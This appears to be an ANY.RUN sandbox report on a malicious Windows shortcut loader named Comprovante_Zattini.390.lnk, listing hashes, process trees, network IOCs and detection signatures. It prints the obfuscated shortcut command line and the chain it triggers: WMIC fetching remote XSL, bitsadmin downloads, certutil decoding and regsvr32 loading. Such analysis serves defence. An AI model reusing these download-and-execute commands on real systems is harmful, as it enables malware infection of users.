analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Comprovante_Zattini.390.lnk

Full analysis: https://app.any.run/tasks/90b3e40b-f5cf-4b08-872b-14165186619c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 24, 2019, 14:06:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
apt
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=23, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5:

A48A820F22CEB01A84A7E873ECC227DD

SHA1:

86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB

SHA256:

018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9

SSDEEP:

48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Runs app for hidden code execution

      • cmd.exe (PID: 2988)

    • Uses BITADMIN.EXE for downloading application

      • WMIC.exe (PID: 2212)

    • Registers / Runs the DLL via REGSVR32.EXE

      • WMIC.exe (PID: 2212)

  • SUSPICIOUS

    • Application launched itself

      • WMIC.exe (PID: 1944)

    • Starts CertUtil for decode files

      • WMIC.exe (PID: 2212)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2988)
      • WMIC.exe (PID: 2212)

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 3104)
      • certutil.exe (PID: 2952)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: dedicado-web
IconFileName: %SystemRoot%\system32\imageres.dll
CommandLineArguments: /start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|%ComSpec%"
Description: bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY
LocalBasePath: C:\Windows\System32\cmd.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 23
TargetFileSize: 302592
ModifyDate: 2010:11:21 04:24:03+01:00
AccessDate: 2010:11:21 04:24:03+01:00
CreateDate: 2010:11:21 04:24:03+01:00
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
90
Monitored processes
31
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe wmic.exe bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe no specs bitsadmin.exe no specs certutil.exe bitsadmin.exe no specs certutil.exe no specs cmd.exe no specs bitsadmin.exe no specs certutil.exe bitsadmin.exe no specs certutil.exe no specs regsvr32.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Windows\System32\cmd.exe" /start /MIN C:\Windows\system32\cmd.exe start /MIN C:\Windows\system32\cmd.exe /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|C:\Windows\system32\cmd.exe"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3640C:\Windows\system32\cmd.exe /S /D /c" echo %x:usf6=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3712C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1944C:\\Windows\\system32\\wbem\\WMIC.exe os get f57it6hES, 67hi26a, numberofusers /format:"http://storage.googleapis.com/midgoldem/09/v.txt#025040xiuj6rl9d" C:\Windows\system32\wbem\WMIC.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749911
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2212"C:\Windows\System32\wbem\WMIC.exe" os get AXFWSIIT, XCSBXQWM, QHIMBSHY, lastbootupdate /format:"http://storage.googleapis.com/midgoldem/09/vv.txt#9961769"C:\Windows\System32\wbem\WMIC.exe
WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3544"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2680"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpgC:\Windows\System32\certutil.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4000"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3208"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwb.jpgC:\Windows\System32\certutil.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2304"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg.zC:\Windows\System32\bitsadmin.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
259
Read events
235
Write events
24
Delete events
0

Modification events

(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1944) WMIC.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
2
Suspicious files
8
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3208certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwb.jpgbinary
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D
SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
2356certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwgx.gifbinary
MD5:3881F37A8404226070C4FA5C77193B29
SHA256:DB1C1F2AB8C0DC5365D9EE01C758B38904643ABD3B0D462C03584FAEA73F465B
3808certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwc.jpgbinary
MD5:B3F39EEF88A5D1D3C4918E17F00C7F45
SHA256:D02F75457DB4A054712D07A4D859185AF9C6B26472C4EEBBFD97285BE46DA127
3076cmd.exeC:\Users\Public\Libraries\temporary\r1.logtext
MD5:6FCC95D06CBF92797C500F16EC12B8F6
SHA256:ACAE594A6FEF0C777E710D212EFFAC0E65CE9128C5543B5233C314840E5823EC
2428certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gifbinary
MD5:06C5E02124CAE7A72D67345F5880970C
SHA256:C36EEA80219B821EC6DC40325844285CB3529DE7D7936E88892A8D6B65A6D8DE
4072certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwdx.gifbinary
MD5:405572515BC32CF36CFCC9F62DB4C6E8
SHA256:7F804CF5BACCA1E4A0147D9D52FA7A7FDE923B4AAA7A90725067A2D45780B40A
2212WMIC.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\vv[1].txtxml
MD5:A523C5CEBE290B33595527B765A2B5A9
SHA256:6BDE1BDFC46E54FFAE9A6CDB98E572633896CE7D96A98494E977A5B5F2C3B299
2904certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwg.gifbinary
MD5:F378C07E5D06F3B07FC59A52DE5B231B
SHA256:3F26FA7BA03B9A026DEB7D24866C44DEB3C84FB5B490ABB49440E381511650F3
3612certutil.exeC:\Users\Public\Libraries\temporary\falxconxrenwxb.~binary
MD5:B26259F3939707FF780F5F4B00AF5A39
SHA256:3E5BA74875D9B3743AD4C1002822940FA890E12E22D68A5824C7B09DF3F40868
1944WMIC.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\v[1].txtxml
MD5:DDC4580B1727864527DA836ECFF67434
SHA256:65C4E0703F3911D87B731671FBAC7D7D4082DABC4907F3ABF690EBF29F892D6A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163
US
whitelisted
2212
WMIC.exe
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/09/vv.txt
US
xml
9.88 Kb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896
US
text
308 Kb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567
US
text
308 Kb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896
US
text
247 Kb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177
US
text
1.19 Mb
whitelisted
HEAD
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882
US
text
68.6 Kb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882
US
text
247 Kb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567
US
text
1.19 Mb
whitelisted
GET
200
172.217.18.16:80
http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065
US
text
1.37 Mb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted
1944
WMIC.exe
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted
2212
WMIC.exe
172.217.18.16:80
storage.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
storage.googleapis.com
  • 172.217.18.16
whitelisted

Threats

PID
Process
Class
Message
1944
WMIC.exe
A Network Trojan was detected
ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
1944
WMIC.exe
Misc activity
SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
2212
WMIC.exe
A Network Trojan was detected
ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
2212
WMIC.exe
Misc activity
SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Comprovante_Zattini.390.lnk